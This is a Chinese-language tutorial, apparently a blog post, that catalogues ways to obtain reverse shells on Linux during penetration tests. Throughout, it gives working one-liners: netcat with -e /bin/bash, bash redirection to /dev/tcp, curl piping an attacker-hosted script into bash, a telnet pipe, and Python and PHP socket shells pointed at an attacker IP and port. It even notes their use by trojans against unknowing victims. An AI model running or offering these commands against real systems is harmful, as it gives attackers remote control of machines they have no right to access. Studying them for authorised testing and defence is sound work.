在对 Linux 系统进行渗透测试中，常常会用到反弹 shell 的操作，今天来总结一下常用反弹 shell 的方式。

什么是反弹shell：

反弹shell，就是攻击机监听在某个TCP/UDP端口为服务端，目标机主动发起请求到攻击机监听的端口，并将其命令行的输入输出转到攻击机。

正向连接：

假设我们攻击了一台机器，打开了该机器的一个端口，攻击者在自己的机器去连接目标机器（目标ip：目标机器端口），这是比较常规的形式，我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。

什么情况下需要用到反弹shell：

大致有如下几种情况：

1. 由于防火墙等限制，对方机器只能发送请求，不能接收请求。
2. 拿到了目标机器的远程执行命令权限，为操作方便想要在本机拿到 shell 。
3. 目标机位于局域网，直接连接不了。
4. 目标机器的ip动态改变，你不能持续控制。
5. 对于病毒，木马，受害者什么时候能中招，对方的网络环境是什么样的，什么时候开关机等情况都是未知的，所以建立一个服务端让恶意程序主动连接，才是上策。

对于以上几种情况，我们是无法利用正向连接的，要用反向连接。

反弹 shell 的方式有很多，那具体要用哪种方式还需要根据目标主机的环境来确定，比如目标主机上如果安装有 netcat，那我们就可以利用 netcat 反弹 shell，如果有python环境，可以利用 python 反弹。如果具有 php 环境也同理。

1、利用netcat反弹shell

netcat（简称 nc）被称为网络工具中的瑞士军刀，体积小巧，但功能强大，可以通过TCP或UDP协议进行网络连接和数据传输，是一种非常强大而又灵活的网络工具。目前，默认的各个Linux发行版本已经自带了 netcat 工具包，windows 也可以下载使用：下载链接

Linux 下出于安全考虑，原生版本的 netcat 可以直接发布与反弹本地 shell 的功能参数 -e 都被阉割了，想要通过 netcat 反弹 shell 需要手动下载二进制安装包。

NC常用参数介绍：

-l：侦听模式，即使没有接收到数据包，也会一直保持连接状态。

-p：指定本地端口号。如果未指定，则nc将随机选择一个空闲的端口。

-v：提供更详细的输出信息，例如打印出nc建立的连接和传输的数据。使用vv获取更详细的信息。

-e：指定要在连接建立后执行的命令。

-n：不执行DNS解析，使用IP地址连接。

-u：使用UDP协议而不是默认的TCP协议。

-w：设置超时时间。如果在指定的时间内没有连接或数据传输，则nc将退出。

-z：仅扫描目标主机的端口，不进行数据传输。

攻击机开启本地监听：

nc -lvvp port

目标机主动连接攻击机：

nc ip port -e /bin/bash
# nc <攻击机IP> <攻击机监听的端口> -e /bin/bash

2、Bash反弹（常用）：

这种方式更加通用。

目标主机上执行：

bash -i >& /dev/tcp/x.x.x.x/port 0>&1

解析：

• bash -i 打开一个交互的bash
• >& 将标准错误输出重定向到标准输出
• /dev/tcp/x.x.x.x/port 意为调用socket,建立socket连接,其中x.x.x.x为要反弹到的主机ip，port为端口
• 0>&1 标准输入重定向到标准输出，实现你与反弹出来的shell的交互

注：/dev/tcp/ 是Linux中的一个特殊设备文件（Linux一切皆文件），实际这个文件是不存在的，它只是 bash 实现的用来实现网络请求的一个接口。打开这个文件就相当于发出了一个socket调用，建立一个socket连接，读写这个文件就相当于在这个socket连接中传输数据。

攻击者主机上执行监听：

nc -lvvp port

nc监听端口时有时会碰到报错：nc: getnameinfo: Temporary failure in name resolution，这是因为域名解析失败造成的，可以加个参数 n 解决。

3、Curl配合Bash反弹shell：

在目标机上执行 curl 攻击者web服务ip|bash，该 ip 的web服务目录里的 index 文件上含有 bash 一句话，就可以反弹shell。

首先，在攻击者自己的服务器 web 目录里面创建一个index文件（index.php或index.html），内容如下：

bash -i >& /dev/tcp/攻击者主机ip/port 0>&1

开启2333端口的监听。

然后再目标机上执行如下，即可反弹shell：

curl 攻击者web服务ip|bash

这里为了方便把 index 文件放在攻击机上了，实际是要放在公网web服务器上的。

4、telnet反弹：

攻击者主机上打开两个终端分别执行监听：

nc -lvvp 3333

nc -lvvp 4444

目标主机中执行：

telnet x.x.x.x 3333 | /bin/bash | telnet x.x.x.x 4444

监听两个端口分别用来输入和输出，其中x.x.x.x均为攻击者ip

反弹shell成功后，在监听3333端口的终端中执行命令可以在另一个终端中看到命令执行结果。

5、常见脚本反弹

Python

当目标主机上有python环境时，我们可以用Python来反弹shell。Python在现在一般发行版Linux系统中都会自带，所以使用起来也较为方便。

攻击机开启本地监听：

nc -lvvp 2333

目标机主动连接攻击机：

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.50.1",2333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

php

当目标主机上有php环境时，我们可以用php来反弹shell。

攻击机开启本地监听：

nc -lvvp 2333

目标机主动连接攻击机：

php -r '$sock=fsockopen("ip",port);exec("/bin/bash -i <&3 >&3 2>&3");'